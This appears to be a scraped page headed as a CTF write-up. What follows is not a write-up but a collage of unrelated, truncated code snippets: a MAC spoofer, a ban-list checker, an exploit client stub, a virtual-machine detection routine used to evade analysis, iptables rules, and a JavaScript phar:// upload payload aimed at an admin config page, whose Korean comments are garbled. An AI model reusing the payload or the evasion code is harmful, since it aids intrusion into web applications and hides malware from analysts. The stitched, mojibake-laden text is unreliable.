Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
| #!/usr/bin/php | |
| <?php | |
| /* | |
| * crontab -e | |
| * 0 5 * * * ~/ping.php | |
| */ | |
| error_reporting(0); | |
| set_time_limit(0); |
| #!/usr/bin/python | |
| import os | |
| import sys | |
| check_root = os.popen("whoami").read().strip() | |
| if check_root == "root": | |
| mac_real = os.popen("ifconfig en0 | grep ether") \ | |
| .read().strip().replace("ether ", "") | |
| mac_hex = os.popen("openssl rand -hex 6").read().strip() |
| <?php | |
| /* This won't work on Tor services */ | |
| function checkSecurity(){ | |
| $list = "ban.txt"; | |
| $deny = array(); | |
| $fo = fopen($list, "r"); | |
| $str = fread($fo, filesize($list)); | |
| fclose($fo); | |
| $str = str_replace(",","_",$str); | |
| $ary = explode("_",$str); |
| import pip | |
| from subprocess import call | |
| for dist in pip.get_installed_distributions(): | |
| call("pip install --upgrade " + dist.project_name, shell=True) |
| #!/usr/bin/python -u | |
| #-*- encoding: utf-8 -*- | |
| import os | |
| import sys | |
| import requests | |
| import json | |
| from base64 import * | |
| HOST = "core.eagle-jump.org" |
| Public Function VirtualMachineProtect() As Boolean | |
| 'VMs are easily detectable by registry and library checkup | |
| On Error Resume Next | |
| Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long | |
| Dim me32 As MODULEENTRY32 | |
| Dim szBuffer As String * 128 | |
| hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId) | |
| me32.dwSize = Len(me32) | |
| Module32First hSnapShot, me32 | |
| Do While Module32Next(hSnapShot, me32) <> 0 |
| iptables -N irccloud | |
| iptables -A irccloud --src 192.184.9.108 -j ACCEPT | |
| iptables -A irccloud --src 192.184.9.110 -j ACCEPT | |
| iptables -A irccloud --src 192.184.9.112 -j ACCEPT | |
| iptables -A irccloud --src 192.184.10.118 -j ACCEPT | |
| iptables -A irccloud --src 192.184.10.9 -j ACCEPT | |
| iptables -A irccloud --src 170.178.187.131 -j ACCEPT | |
| iptables -A irccloud --src 192.184.8.73 -j ACCEPT | |
| iptables -A irccloud --src 192.184.8.103 -j ACCEPT | |
| iptables -A irccloud -j DROP |
| // ์ ๋ก๋ํ ํ์ผ์ ํ์ด๋ก๋. | |
| // var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`; | |
| var payload = `[PAYLOAD_URL]` | |
| // ๋จผ์ ๊ณต๊ฒฉ์ ์์, ํด๋น ๊ธฐ๋ฅ์ ์ง์ํ๋ ๊ด๋ฆฌ์์ธ์ง ํ์ธํ๋ค. | |
| $.get(`../qa_config.php`, function(d){ | |
| // ์์ ํ ๊ณณ์ โํ์ผ ๊ฒฝ๋กโ ๊ฐ ๋ค์ด๊ฐ ๊ณณ์ด๋ฏ๋ก, ์ด ๋ถ๋ถ๋ง ์ฐ์ ํ์ธํ๋ค. | |
| if(d.indexOf(`์๋จ ํ์ผ ๊ฒฝ๋ก`) !== false){ |
| <?php | |
| function generator() | |
| { | |
| $PATH = "./s3cre7_fi1e"; | |
| $init_seed = 0; | |
| if(!file_exists(realpath($PATH))) | |
| { | |
| $init_seed = $seed = intval(uniqid(),10); | |
| $f = fopen($PATH,"w"); | |
| fwrite($f,$init_seed); |